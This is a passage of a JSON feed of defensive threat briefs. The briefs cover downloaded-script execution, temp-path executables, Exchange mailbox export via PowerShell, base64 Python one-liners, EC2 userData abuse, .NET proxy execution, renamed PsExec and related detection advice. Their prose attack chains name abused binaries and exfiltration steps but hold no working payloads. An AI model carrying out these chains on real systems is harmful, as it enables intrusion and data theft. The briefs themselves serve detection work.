followed by execution of script interpreters (wscript.exe, cscript.exe, powershell.exe, mshta.exe, msiexec.exe) with command-line arguments referencing the downloaded script. This activity is often indicative of malicious intent, as legitimate scripts are typically sourced from trusted internal repositories or local file systems, and not directly downloaded and executed. The rule aims to detect suspicious parent-child process relationships (e.g., browser spawning a script interpreter) and identify potential initial access or execution attempts. The rule requires Elastic Defend and a minimum Elastic Stack version of 9.2.0.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user browses to a malicious website or opens a compromised email containing a link.\u003c/li\u003e\n\u003cli\u003eThe user clicks the link, which initiates a download of a malicious script file (e.g., .js, .vbs, .ps1, .msi) via a web browser (chrome.exe, msedge.exe).\u003c/li\u003e\n\u003cli\u003eThe browser saves the downloaded script file to the user\u0026rsquo;s Downloads folder.\u003c/li\u003e\n\u003cli\u003eThe user, either intentionally or through social engineering, executes the downloaded script.\u003c/li\u003e\n\u003cli\u003eWindows executes the script using a scripting utility like wscript.exe, cscript.exe, powershell.exe, mshta.exe, or msiexec.exe.\u003c/li\u003e\n\u003cli\u003eThe scripting utility executes the malicious code within the script, potentially establishing persistence, downloading additional payloads, or performing reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe script may attempt to elevate privileges or bypass security controls to gain further access to the system.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as deploying ransomware, stealing sensitive data, or establishing a remote access backdoor.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to a variety of negative outcomes, including malware infection, data theft, and system compromise. If the downloaded script is malicious, it can allow attackers to gain a foothold on the system, escalate privileges, and move laterally within the network. This can result in significant financial losses, reputational damage, and disruption of business operations. The number of victims and affected sectors can vary depending on the scale and scope of the attack.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Elastic Defend integration to collect necessary event data, as described in the \u003ca href=\"https://ela.st/install-elastic-defend\"\u003esetup instructions\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Execution of a Downloaded Windows Script\u0026rdquo; to your SIEM and tune for your environment to detect the execution of downloaded scripts.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging and file creation events to provide the necessary data for the Sigma rules to function correctly.\u003c/li\u003e\n\u003cli\u003eImplement application whitelisting to restrict the execution of unauthorized scripts and scripting utilities to reduce the risk of similar threats in the future, as mentioned in the \u0026ldquo;Response and remediation\u0026rdquo; section.\u003c/li\u003e\n\u003cli\u003eBlock known malicious domains and URLs identified in related threat intelligence feeds to prevent users from downloading malicious scripts in the first place.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of downloading and executing untrusted scripts from the internet, as this is a common initial access vector.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-downloaded-script-execution/","summary":"This rule identifies the creation and subsequent execution of a Windows script downloaded from the internet, a technique used by adversaries for initial access and execution on Windows systems.","title":"Execution of a Downloaded Windows Script","url":"https://feed.craftedsignal.io/briefs/2024-01-downloaded-script-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["defense-evasion","persistence","privilege-escalation","execution","temp-directory","file-creation"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis threat brief focuses on the creation of executable files or scripts within temporary directories on Windows systems, a common tactic used by adversaries to bypass security controls and establish persistence. This behavior is often indicative of malicious activity, such as malware installation, privilege escalation, or unauthorized code execution. The observed activity involves writing files with extensions like \u003ccode\u003e.exe\u003c/code\u003e, \u003ccode\u003e.dll\u003c/code\u003e, \u003ccode\u003e.ps1\u003c/code\u003e, and \u003ccode\u003e.bat\u003c/code\u003e into common temporary locations like \u003ccode\u003e\\Windows\\Temp\\\u003c/code\u003e or \u003ccode\u003e\\AppData\\Local\\Temp\\\u003c/code\u003e. This technique allows attackers to hide malicious files among legitimate temporary files, making detection more challenging. References to campaigns like Volt Typhoon, and ransomware families like LockBit highlight the importance of detecting this behavior.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious executable or script onto the compromised system.\u003c/li\u003e\n\u003cli\u003eTo evade detection, the malicious file is created in a temporary directory such as \u003ccode\u003eC:\\Windows\\Temp\\\u003c/code\u003e or \u003ccode\u003eC:\\Users\\\u0026lt;username\u0026gt;\\AppData\\Local\\Temp\\\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a dropper or installer to write the malicious file (e.g., using \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker may rename the file to further disguise its purpose.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the malicious file, potentially leading to code execution, privilege escalation, or persistence.\u003c/li\u003e\n\u003cli\u003eThe executed malware performs malicious actions, such as lateral movement, data exfiltration, or ransomware deployment.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the system, ensuring continued access and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution, privilege escalation, and persistent access within the targeted environment. This can result in data theft, system compromise, or ransomware deployment. The references to campaigns like Volt Typhoon and ransomware families like LockBit highlight the potential for significant disruption and financial loss. Multiple analytic stories, such as AsyncRAT, DarkGate Malware, and Qakbot, highlight the prevalence of this technique across various threat actors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon EventID 11 (FileCreate) logging to monitor file creation events on endpoints.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Executable or Script Creation in Temp Path\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eInvestigate any file creation events in temporary directories involving executable or script file types (.exe, .dll, .ps1, .bat, etc.).\u003c/li\u003e\n\u003cli\u003eReview and filter events based on your organization\u0026rsquo;s normal activity to reduce false positives, as mentioned in the \u0026ldquo;known_false_positives\u0026rdquo; section of the source.\u003c/li\u003e\n\u003cli\u003eMonitor for processes spawned from temporary directories, using a process creation monitoring tool and correlate with other suspicious activities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-executables-or-script-creation-in-temp-path/","summary":"Adversaries may create executables or scripts in temporary directories to evade detection, maintain persistence, and execute unauthorized code on Windows systems.","title":"Executable or Script Creation in Temporary Paths","url":"https://feed.craftedsignal.io/briefs/2024-01-executables-or-script-creation-in-temp-path/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Exchange","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["collection","execution","powershell","exchange","mailbox"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eAttackers may target user email to collect sensitive information. The \u003ccode\u003eNew-MailBoxExportRequest\u003c/code\u003e cmdlet is used to export the contents of a primary mailbox or archive to a .pst file. Note that this is done on a per-mailbox basis and this cmdlet is available only in on-premises Exchange. Attackers can abuse this functionality in preparation for exfiltrating contents, which is likely to contain sensitive and strategic data. This activity is typically performed using PowerShell or similar scripting tools and can be difficult to detect without specific monitoring in place. The activity may be part of a larger attack campaign targeting sensitive information.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a compromised system with sufficient privileges to access Exchange PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the Exchange server using PowerShell.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eNew-MailboxExportRequest\u003c/code\u003e cmdlet to initiate the export of a target mailbox to a .pst file. The command may include parameters to filter specific content.\u003c/li\u003e\n\u003cli\u003eThe Exchange server processes the export request, creating a .pst file containing the mailbox data.\u003c/li\u003e\n\u003cli\u003eThe attacker retrieves the exported .pst file from the designated file path.\u003c/li\u003e\n\u003cli\u003eThe attacker may compress and archive the .pst file to reduce its size for exfiltration.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates the .pst file to an external location controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe attacker analyzes the .pst file to extract sensitive information such as credentials, financial data, or intellectual property.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows the attacker to gain access to sensitive information contained within the exported mailboxes. This could lead to financial loss, reputational damage, or compromise of intellectual property. Depending on the scope of the export requests, multiple mailboxes may be compromised, impacting a large number of users. The impact is significant because email often contains highly sensitive business communications and data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon process creation logging to monitor PowerShell execution with command-line arguments (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect the use of \u003ccode\u003eNew-MailboxExportRequest\u003c/code\u003e cmdlet in PowerShell commands.\u003c/li\u003e\n\u003cli\u003eReview the privileges of users with the \u0026ldquo;Mailbox Import Export\u0026rdquo; privilege to ensure that the least privilege principle is being followed.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for PowerShell activity related to mailbox export requests (Data Source: Windows Security Event Logs).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to identify potential malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-exchange-mailbox-export/","summary":"Adversaries may use the New-MailboxExportRequest PowerShell cmdlet to export mailboxes in Exchange, potentially leading to sensitive information theft.","title":"Exchange Mailbox Export via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-exchange-mailbox-export/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["execution","defense-evasion","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eAttackers are increasingly leveraging Python one-liners with base64 encoding on Linux systems to deliver and execute malicious payloads. This technique allows for effective obfuscation, making it harder for conventional security solutions to detect the true nature of the executed commands. The use of \u003ccode\u003ebase64\u003c/code\u003e within Python scripts executed directly from the command line is a red flag, as it is rarely observed in standard administrative tasks but is frequently used to hide malicious intent. Defenders must prioritize detecting this behavior to uncover potentially compromised systems and prevent further escalation. This activity has been observed in conjunction with fake AI websites used to deliver malware.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Linux system through an undisclosed method (e.g., exploiting a vulnerability or social engineering).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or creates a script containing a base64-encoded payload.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a Python one-liner, invoking the \u003ccode\u003epython\u003c/code\u003e interpreter.\u003c/li\u003e\n\u003cli\u003eThe Python script imports the \u003ccode\u003ebase64\u003c/code\u003e module.\u003c/li\u003e\n\u003cli\u003eThe script decodes the base64-encoded payload using functions like \u003ccode\u003eb64decode\u003c/code\u003e, \u003ccode\u003eb32decode\u003c/code\u003e, or similar.\u003c/li\u003e\n\u003cli\u003eThe decoded payload is executed using \u003ccode\u003eeval()\u003c/code\u003e or \u003ccode\u003eexec()\u003c/code\u003e within the same Python one-liner.\u003c/li\u003e\n\u003cli\u003eThe executed payload establishes persistence, downloads further malware, or performs lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to a full system compromise, data exfiltration, or the deployment of persistent backdoors. The obfuscation techniques make detection difficult, potentially allowing attackers to operate undetected for extended periods. While the specific number of victims and targeted sectors remain unknown, the technique\u0026rsquo;s effectiveness in evading security measures makes it a high-priority threat.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Python Base64 One-Liners - Linux\u0026rdquo; to your SIEM to detect the execution of Python one-liners utilizing base64 decoding (logsource: process_creation/linux).\u003c/li\u003e\n\u003cli\u003eInvestigate any process creation events matching the Sigma rule, focusing on the parent processes and executed commands to identify the source of the malicious activity.\u003c/li\u003e\n\u003cli\u003eEnable and monitor process creation logs on Linux systems to ensure visibility of command-line execution, which is essential for detecting this type of attack (logsource: process_creation/linux).\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted scripts, mitigating the risk of malicious payload execution after decoding.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-python-base64-linux/","summary":"This brief focuses on detecting the execution of Python one-liners utilizing base64 decoding functions on Linux systems, a technique employed by malicious actors to obfuscate and execute payloads, thereby evading traditional security measures.","title":"Detection of Python Base64 Encoded Execution on Linux","url":"https://feed.craftedsignal.io/briefs/2024-01-python-base64-linux/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["EC2"],"_cs_severities":["high"],"_cs_tags":["aws","ec2","user-data","privilege-escalation","persistence","execution"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eThis detection identifies a specific sequence of AWS EC2 API calls suggesting malicious intent. An adversary may update the \u003ccode\u003euserData\u003c/code\u003e attribute of an EC2 instance and then restart the instance to execute malicious scripts with elevated privileges (root on Linux, SYSTEM on Windows). The technique involves modifying instance attributes to inject malicious code or scripts, followed by stopping and starting the instance to trigger execution of the modified user data. This can lead to privilege escalation, persistence, or other malicious activities within the AWS environment. The detection focuses on the correlation of \u003ccode\u003eStopInstances\u003c/code\u003e, \u003ccode\u003eStartInstances\u003c/code\u003e, and \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e events that reference \u003ccode\u003euserData\u003c/code\u003e within a 5-minute window. The rule groups these events by instance ID, username, account ID, source IP, and user agent, triggering an alert only when all three distinct API calls are observed within the same group. This aims to reduce false positives by requiring the complete sequence of actions associated with this technique.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to an AWS account with sufficient permissions to manage EC2 instances (e.g., via compromised credentials or an IAM role).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a target EC2 instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e API call to update the \u003ccode\u003euserData\u003c/code\u003e attribute of the target instance, injecting malicious code or scripts.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eStopInstances\u003c/code\u003e API call to stop the target EC2 instance.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the \u003ccode\u003eStartInstances\u003c/code\u003e API call to start the target EC2 instance.\u003c/li\u003e\n\u003cli\u003eUpon instance start, the modified \u003ccode\u003euserData\u003c/code\u003e script executes with elevated privileges, potentially installing malware, establishing persistence, or performing other malicious actions.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the compromised instance to further explore the AWS environment, escalate privileges, or exfiltrate data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized code execution within the AWS environment. Attackers can gain elevated privileges on the compromised EC2 instance, potentially leading to full control of the instance and the ability to access sensitive data or resources within the AWS account. This can result in data breaches, service disruptions, and financial losses. The modification of user data allows for persistent malicious code execution each time the instance restarts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the following Sigma rules to your SIEM to detect the described attack pattern, and tune them to your environment.\u003c/li\u003e\n\u003cli\u003eReview CloudTrail logs for \u003ccode\u003eModifyInstanceAttribute\u003c/code\u003e events with \u003ccode\u003euserData\u003c/code\u003e to identify potentially malicious modifications.\u003c/li\u003e\n\u003cli\u003eMonitor EC2 instance state transitions (stop/start) in conjunction with user data modifications.\u003c/li\u003e\n\u003cli\u003eImplement least privilege IAM policies to restrict access to EC2 management APIs.\u003c/li\u003e\n\u003cli\u003eUse AWS Secrets Manager or Parameter Store to manage secrets instead of embedding them in \u003ccode\u003euserData\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules and correlate them with other security events.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-03-aws-ec2-user-data-modification/","summary":"Detection of a sequence of AWS EC2 management API calls indicative of malicious modification of instance user data to execute arbitrary code upon instance restart, potentially leading to privilege escalation and persistence.","title":"AWS EC2 Stop, Start, and User Data Modification Correlation","url":"https://feed.craftedsignal.io/briefs/2024-01-03-aws-ec2-user-data-modification/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["high"],"_cs_tags":["proxy-execution","net-utility","defense-evasion","execution","signed-binary-proxy-execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis threat brief addresses the abuse of trusted Microsoft .NET binaries as proxies for malicious code execution. Attackers leverage script-based execution (e.g., PowerShell, VBScript, batch files) from atypical or user-writable directories to launch .NET utilities like aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, and vbc.exe. This method allows threat actors to bypass security controls and blend in with legitimate system activity. Observed activity occurs in environments where endpoint detection and response (EDR) agents are deployed. The lack of command-line variation between the utility\u0026rsquo;s image path and its executed process reinforces the suspicion of proxy execution. This technique has been associated with malware campaigns, including the deployment of VIP Keylogger.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to the system (potentially through phishing or exploiting a software vulnerability, although this source does not specify the entry vector).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious script (e.g., a PowerShell script) into a user-writable directory such as C:\\Users\\Public\\ or C:\\Temp\\.\u003c/li\u003e\n\u003cli\u003eThe malicious script executes, and is often obfuscated to evade detection, from the non-standard location.\u003c/li\u003e\n\u003cli\u003eThe script then calls a legitimate .NET utility (e.g., InstallUtil.exe) to execute malicious code.\u003c/li\u003e\n\u003cli\u003eThe .NET utility executes with minimal command-line arguments, often just the executable path itself, to further blend in with legitimate activity.\u003c/li\u003e\n\u003cli\u003eThe .NET utility loads and executes attacker-controlled code, bypassing application control policies.\u003c/li\u003e\n\u003cli\u003eThe malicious code performs actions such as keylogging (as seen with VIP Keylogger), credential theft, or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as data exfiltration or establishing persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation enables attackers to bypass application control and execute arbitrary code, potentially leading to data theft, system compromise, and persistent access. While the number of victims and specific sectors are not detailed in this brief\u0026rsquo;s source, the use of VIP Keylogger as a payload demonstrates the potential for sensitive data exfiltration. Organizations lacking robust endpoint detection capabilities are at significant risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect .NET Utility Execution from Unusual Script Parents\u0026rdquo; to identify potential proxy execution attempts based on process relationships and file paths (rule provided below).\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of .NET utilities (aspnet_compiler.exe, msbuild.exe, regasm.exe, InstallUtil.exe, vbc.exe) being launched from user-writable directories, especially when the parent process is a script interpreter (batch, CMD, PowerShell, JScript, VBScript, HTML).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events (Sysmon EventID 1 or Windows Event Log Security 4688) for unusual parent-child process relationships involving script interpreters and .NET utilities.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of .NET utilities from untrusted locations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-03-proxy-execution-net-utilities/","summary":"Detects the execution of .NET utilities by script processes from unusual locations, indicative of signed binary proxy execution for defense evasion and code execution.","title":"Windows Proxy Execution of .NET Utilities via Scripts","url":"https://feed.craftedsignal.io/briefs/2024-01-03-proxy-execution-net-utilities/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Sysmon"],"_cs_severities":["medium"],"_cs_tags":["psexec","lateral-movement","execution","defense-evasion","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic"],"content_html":"\u003cp\u003ePsExec is a legitimate remote administration tool developed by Microsoft as part of the Sysinternals Suite, enabling the execution of commands with both regular and SYSTEM privileges on Windows systems. It functions by executing a service component, \u003ccode\u003ePsexecsvc.exe\u003c/code\u003e, on a remote system, which then runs a specified process and returns the results to the local system. While commonly used by administrators, adversaries frequently abuse PsExec for lateral movement and to execute commands as SYSTEM, effectively disabling defenses and bypassing security protections. This detection identifies instances where the PsExec service component is executed using a custom name, a tactic employed to evade security controls or detections targeting the default PsExec service component name. The rule was last updated on 2026-05-04 and covers Elastic Defend, Windows, M365 Defender, and Crowdstrike data sources.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system within the network (e.g., via phishing or exploiting a public-facing application).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads a renamed version of \u003ccode\u003epsexesvc.exe\u003c/code\u003e to a compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a tool like the standard \u003ccode\u003ePsExec.exe\u003c/code\u003e to initiate a remote connection to a target system.\u003c/li\u003e\n\u003cli\u003ePsExec attempts to copy the renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e to the ADMIN$ share on the target system.\u003c/li\u003e\n\u003cli\u003eThe renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e is executed as a service on the remote host.\u003c/li\u003e\n\u003cli\u003eThe renamed service executes commands specified by the attacker with SYSTEM privileges.\u003c/li\u003e\n\u003cli\u003eThe results of the commands are returned to the originating system.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the command execution for lateral movement, data exfiltration, or further compromise of the environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to complete compromise of the target system and potentially the entire network. By executing commands with SYSTEM privileges, attackers can disable security controls, install malware, steal sensitive data, or move laterally to other critical systems. The use of a renamed PsExec executable demonstrates an attempt to evade detection, increasing the likelihood of a successful breach.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Process Execution via Renamed PsExec Executable\u0026rdquo; to your SIEM and tune for your environment to detect the execution of renamed \u003ccode\u003epsexesvc.exe\u003c/code\u003e executables.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the necessary process execution details for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by this rule promptly, focusing on the commands executed and the target systems involved.\u003c/li\u003e\n\u003cli\u003eReview and enforce the principle of least privilege to minimize the potential impact of compromised accounts.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from unusual or untrusted systems, which could indicate PsExec usage.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-renamed-psexec/","summary":"Detects suspicious PsExec activity where the PsExec service component is executed using a custom name, indicating an attempt to evade detections that look for the default PsExec service component name.","title":"Suspicious Process Execution via Renamed PsExec Executable","url":"https://feed.craftedsignal.io/briefs/2024-01-renamed-psexec/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows"],"_cs_severities":["medium"],"_cs_tags":["execution","lateral-movement","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThe detection rule identifies suspicious PowerShell activity related to scheduled tasks. Adversaries exploit Task Scheduler to execute malicious scripts, facilitating lateral movement or remote discovery. The rule monitors for the Task Scheduler DLL load within PowerShell processes (powershell.exe, pwsh.exe, powershell_ise.exe) followed by outbound RPC connections, signaling potential misuse. This activity may be indicative of attackers leveraging scheduled tasks for remote execution or reconnaissance within a compromised network. The detection logic focuses on the sequence of loading \u003ccode\u003etaskschd.dll\u003c/code\u003e and initiating an RPC connection to port 135, a common port for Distributed Component Object Model (DCOM) communication.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through various means.\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to interact with the Task Scheduler service.\u003c/li\u003e\n\u003cli\u003ePowerShell process (powershell.exe, pwsh.exe, or powershell_ise.exe) loads the \u003ccode\u003etaskschd.dll\u003c/code\u003e library.\u003c/li\u003e\n\u003cli\u003eThe attacker creates or modifies a scheduled task using PowerShell commands.\u003c/li\u003e\n\u003cli\u003eThe scheduled task is configured to execute a malicious payload.\u003c/li\u003e\n\u003cli\u003ePowerShell initiates an outbound RPC connection on port 135.\u003c/li\u003e\n\u003cli\u003eThe malicious payload executes, potentially leading to lateral movement or remote discovery.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their objective, such as gaining control of additional systems or gathering sensitive information.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized remote code execution, lateral movement within the network, and the potential compromise of sensitive data. The creation or modification of scheduled tasks can provide persistence for attackers, allowing them to maintain access to compromised systems even after reboots. The impact includes potential data breaches, system compromise, and disruption of services.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon Event ID 7 (Image Loaded) and Event ID 3 (Network Connection) logging to detect the specific activity described in the attack chain.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Outbound Scheduled Task Activity via PowerShell\u0026rdquo; to your SIEM and tune the \u003ccode\u003emaxspan\u003c/code\u003e value based on your environment\u0026rsquo;s typical activity patterns.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on identifying the specific PowerShell commands used and the scheduled tasks created or modified.\u003c/li\u003e\n\u003cli\u003eMonitor network connections to port 135 originating from PowerShell processes, and correlate with other security events to identify suspicious patterns.\u003c/li\u003e\n\u003cli\u003eImplement stricter controls on the creation and modification of scheduled tasks, limiting access to authorized personnel only.\u003c/li\u003e\n\u003cli\u003eReview and clean up any unauthorized scheduled tasks on systems to prevent persistent malicious activity.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T10:00:00Z","date_published":"2024-01-03T10:00:00Z","id":"/briefs/2024-01-scheduled-task-powershell/","summary":"This rule detects PowerShell loading the Task Scheduler COM DLL followed by an outbound RPC network connection, potentially indicating lateral movement or remote discovery via scheduled tasks.","title":"Suspicious Outbound Scheduled Task Activity via PowerShell","url":"https://feed.craftedsignal.io/briefs/2024-01-scheduled-task-powershell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Splunk Enterprise","Splunk Enterprise Security","Splunk Cloud"],"_cs_severities":["high"],"_cs_tags":["powershell","environment-variable","invoke-expression","execution"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers are increasingly leveraging PowerShell to execute malicious code embedded within environment variables. This method involves storing commands or encoded content in environment variables and then using \u003ccode\u003eInvoke-Expression\u003c/code\u003e (or its alias \u003ccode\u003eiex\u003c/code\u003e) to dynamically construct and execute code at runtime. This tactic is employed to evade traditional static analysis techniques and conceal the true intent of the executed code. Observed in malware loaders and stagers, including those associated with the VIP Keylogger campaign, this technique is a significant threat. Defenders should be aware of this trend and implement appropriate detection mechanisms. The focus is on identifying PowerShell scripts that combine environment variable access (\u003ccode\u003e$env:\u003c/code\u003e) with \u003ccode\u003eInvoke-Expression\u003c/code\u003e or its aliases, based on PowerShell Script Block Logging (Event ID 4104).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to 